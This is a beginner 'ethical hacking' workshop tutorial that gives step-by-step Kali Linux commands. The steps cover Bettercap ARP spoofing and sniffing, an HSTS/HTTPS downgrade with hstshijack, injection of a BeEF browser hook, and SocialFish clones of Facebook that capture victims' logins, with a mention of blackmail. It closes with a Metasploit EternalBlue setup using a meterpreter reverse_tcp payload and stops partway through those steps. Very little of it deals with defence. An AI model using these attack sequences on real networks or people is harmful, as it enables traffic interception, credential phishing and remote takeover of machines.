Dec 28th @ in5 - Introduction to Ethical Hacking and Cyber Security. At this session, we went over the basics of cybersecurity and showed how you can protect yourself from some common attacks. Using Kali Linux as a platform, we isolated exploits and recreate some of the more common major attacks (eg; ‘Man-In-The-Middle’) using a variety of penetration testing tools such as the Browser Exploitation Framework, also showed how to inoculate your systems against each malicious action.
This is a beginner workshop tutorial on network hacking tools such as BeEF, Social Fish and Bettercap.
https://www.facebook.com/makesmartthings/videos/686763711857192/
Copy the entire link, instead of clicking on the hyperlink.
https://drive.google.com/open?id=1t2LhMz6TcZ1ne5fXdH1WG3NwOr57WIb_
Kali Linux image: https://images.offensive-security.com/virtual-images/kali-linux-2019.4-vbox-amd64.ova
Installation instructions for Windows: https://www.youtube.com/watch?v=XlJ7FsI0wj4
Installation instructions for Mac: https://www.youtube.com/watch?v=J7VFSrye8u0
Windows 7 image -https://softlay.net/operating-system/windows-7-ultimate-iso-download.html
Installation instructions for Windows: https://www.youtube.com/watch?v=cpRTGtCmZUs
Installation instructions for Mac:https://www.youtube.com/watch?v=HAKJdqYEEmY
Bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energydevices, wireless HID devices and Ethernet networks.
Power ON the Machine
Okay, to start working, we need to first search and click for “VirtualBox” then select the engine and click start at the top. This way we have everything set up to start working with Kali Linux with Default username: root and pass: toor
apt install bettercap
apt-get update
net.probe on
net.show
help arp.spoof
Now we proxy the connection as we want the victim to know we are the gateway but we don’t want the gateway to know we are targeting it so that we can get responses.
set arp.spoof.fullduplex true
To select the victim’s ip address which we want to target , just fill the “bla” spaces with numbers.
set arp.spoof.targets bla.bla.bla.bla
arp.spoof on
To capture the victim’s data aka “sniffing”
net.sniff on
Now we use WireShark which is a tool that captures the victim’s information and decodes into a file that is easy to read by the user so to Run the program, all you need to do is type “wireshark” on another new terminal.
Now to release the attack on the wanted interface , select “etho” and observe the traffic, choose a site and stop the traffic then write “http” on the filter.
Now is Testing Time!!! So all you need to do is go to any “http” Website and not “https” and then you can enter some data and check the “POST” Packets to see how your data has been sniffed and sent to the hacker.
So now after learning how to use it on http. We will learn how to downgrade any website such as “https” and “hsts” to “http”. We begin by going to the below directory and deleting the file named “hstshihack”
/usr/share/bettercap/caplets
Now we download the new file by cloning the github repository of the “hstshijack” tool.
git clone https://github.com/The-Assembly/Intro-to-Ethical-Hacking/blob/master/hstshijack/
Then, we go to the downloads file and cut the file named “hstshijack” and paste it in place of the previous file following this path /usr/share/bettercap/caplets
Lastly, to use the tool, we have to type in the terminal and follow the above stepsstarting from no.3 to perform the attack.
hstshijack/hstshijack
BeEF is a penetration testing tool that focuses on web browsers vulnerabilities to be able to secure web browsers against malicious attacks.
First, we have to update the repositories to make sure that we start fresh
apt-get update
We install the tool
apt install beef.xss
We initialize the tool by typing “beef-xss”
Then you are asked to type a password.Enter any password that you choose. However, make sure you remember this password as you will need it later for a following step.
Look for the “script” tag and copy it.
To perform our attack, you need inject the code line into the website by pasting it to apache server so you have to navigate the wanted folder by going to “home” and write the following piece
/var/www/html/index.html
Paste the script line in the above file and then spot the IP Address at the bottom of the file and fill in you own device ip address.
Go to the browser and add a zero to the ip address at the top as such “172.0.0.1”. You’ll be directed to a login page so just enter “beef” as username and the password you have set before.
Now, we have to run the Apache Server by typing the following commands
apt apache2 install
service apache2 start
Then, we have to hook a server file so we go to the browser and paste the ip address of the victim which in this case is our ip address that we got from the -ipconfig- command. You should be redirected then to a page with a msg that says that your hooked.
Next, we should have a connection on some networks under online browsers. So under online browsers, after clicking on the wanted network address, you’ll find a list of commands and ways to play with and execute attacks on the victim such as “Alert Dialogue” option. This will display the directed message on the victim’s device.
There are many other commands that could performed such as Pretty theft and Google Phishing which creates a fake page exactly like google to record your activities.
This is a tool that is used to create a duplicate of a popular site like Facebook,Instagram,Twitter..etc so that the hacker could trick the victim into thinking this is the real page and have them login with their data and then be able to manipulate the data and perhaps blackmail them with it.
git clone https://github.com/UndeadSec/SocialFish
cd SocialFish/
apt-get install python3 python3-pip python3-dev -y
python -m pip install -r requirements.txt
python3 SocialFish.py root pass
Then, you go to the top under the Social Fish logo, you’ll notice a line that says “Go to http://0.0.0.0:5000/neptune to start”. So you paste the ip address into your browser.
You will be redirected to a login page where you can enter “root” for username and “pass” for password
Now, you could write the name of the website you want to clone and the one to be redirected to. For example:
Now if you copy the ip address “0.0.0.0:5000/Neptune” You’ll be redirected to the cloned page which in this case is facebook. This is a fake page based on facebook design and everything that you enter gets copied and sent to the hacker. So to test it, just enter any garbage text and submit.
You can check your entries or responses got from the fake site we cloned by going down on the original page and clicking “View” to see whatever username and pass were entered.
Zenmap is the Nmap security scanner graphical user interface and provides for hundreds of options. It lets users do things like save scans and compare them, view network topology maps, view displays of ports running on a host or all hosts on a network, and store scans in a searchable database
Click on the Zenmap icon from the left panel on linux desktop
Go to the terminal to get the gateway gateway route -n
Then we go to the target tab and enter the gateway found with /24
Then we choose “Quick Scan plus” as a profile
After waiting for some time, we will be able to see all IP addresses that are connected on that gateway
We choose one as our target. In this case, we will choose one with Windows 7
Now we don’t know whether this network is vulnerable or not so for that we will be using a tool called “Metasploit” which will be discussed further in the next step.
The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
/usr/share/Metasploit-framework/modules/exploits/windows/smb
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
show options
to see the different things we could do with the tool.set RHOSTS <<victim’s ip add>>
use exploit/windows/smb/eternalblue_doublepulsar
set RHOSTS <<victim’s ip add>>
set PROCESSINJECT lssas.exe
set PAYLOAD windows/x64/meterpeter/reverse_tcp
set LHOST <<your ip address>>